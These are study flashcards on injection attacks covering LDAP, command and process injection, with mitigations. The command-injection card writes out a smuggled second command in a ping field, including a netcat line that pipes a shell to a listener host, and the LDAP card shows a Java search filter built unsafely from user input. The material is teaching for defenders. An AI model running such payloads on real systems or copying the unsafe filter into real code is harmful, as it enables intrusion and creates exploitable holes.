Section 19.185 Injection Attacks Flashcards

Objective 2.4 Given a scenario, you must be able to analyse indicators of malicious activity

1
Q

Lightweight Directory Access Protocol (LDAP)

A

An open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network

Often used for authentication and for storing information about users, groups, and applications

2
Q

LDAP Injection

A

An application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input

■ Use input validation and input sanitization as protection against an LDAP injection attack

Example: If a web application uses LDAP as part of the user login process, an attacker could perform an LDAP injection to search for the users on that server by injecting queries into the LDAP search, similar to how an attacker inserts malicious queries in an SQL injection. For example, if the backend code for the server built the search filter directly from user input like this (Java):

String ldapSearch = "(cn=" + searchName + ")";
System.out.println(ldapSearch);

this could allow an attacker to simply enter a wildcard character (*) into the username field; that would then be inserted as the search parameter, producing the filter (cn=*), and display all of the users on the system to the screen.

3
Q

Command Injection

A

Occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application

For example, if you have a web application that allows a user to test connectivity with a remote website or server by simply entering an IP address or host name, and on the backend you use the ping command, this could be subject to a command injection by simply appending a command to that input.

Your application on this website might have a form that allows you to enter an IP address; the web application then takes that input and adds it to the ping command to execute it on your server. So if I enter diontraining.com and hit the button, it is going to send that over and become ping diontraining.com. But if instead I enter diontraining.com && hostname into that field, this will create a command of ping diontraining.com && hostname that is going to be executed by the server shell. This would then return the result of the ping command and then display the host name of that server.

If I wanted to make this a little bit more malicious, I could instead use something like diontraining.com && /bin/sh | nc hacked.diontraining.com 443. This would ping diontraining.com and then move to the second command, which starts up a shell and redirects it through netcat to a listener that I have set up at hacked.diontraining.com on port 443. This would essentially give me full interactive access to this web server by running the simple command injection against that vulnerable server.

4
Q

Process Injection

A

Method of executing arbitrary code in the address space of a separate live process

■ There are many different ways to inject code into a process:
● Injection through DLLs
● Thread Execution Hijacking
● Process Hollowing
● Process Doppelgänging
● Asynchronous Procedure Calls
● Portable Executable Injections

■ Mitigation includes:
● Endpoint security solutions that are configured to block common sequences of attack behavior
● Security Kernel Modules
● Practice of Least Privilege
